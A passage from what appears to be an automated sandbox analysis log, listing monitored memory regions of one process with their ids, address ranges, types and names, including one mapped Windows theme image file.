0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3098 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3099 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3102 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3103 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3145 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3146 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3150 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3151 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3155 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3156 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3165 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3166 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3193 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3194 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3219 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3220 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3236 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3237 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3244 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3250 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3251 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3255 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 3270 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3271 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3277 start_va = 0x10570000 end_va = 0x105effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010570000" filename = "" Region: id = 3278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3287 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3288 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3291 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3292 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3297 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3298 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3323 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3324 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3327 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3328 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3341 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3342 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3345 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3346 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3375 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3380 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3384 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3385 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3388 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3389 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3392 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3393 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3396 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3397 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3400 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3401 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3404 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3405 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3408 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3409 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3412 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3413 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3416 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3417 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3420 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3421 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3424 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3425 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3428 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3429 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3432 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3433 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3436 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3437 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3440 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3441 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3444 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3445 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3448 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3449 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3452 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3453 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3456 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3457 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3460 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3461 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3464 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3465 start_va = 0x1e60000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 3466 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 3467 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3470 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3471 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3474 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3475 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3478 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3479 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3482 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3483 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3486 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3487 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3490 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3491 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3494 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3495 start_va = 0x4a00000 end_va = 0x4a1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 3496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3498 start_va = 0x610000 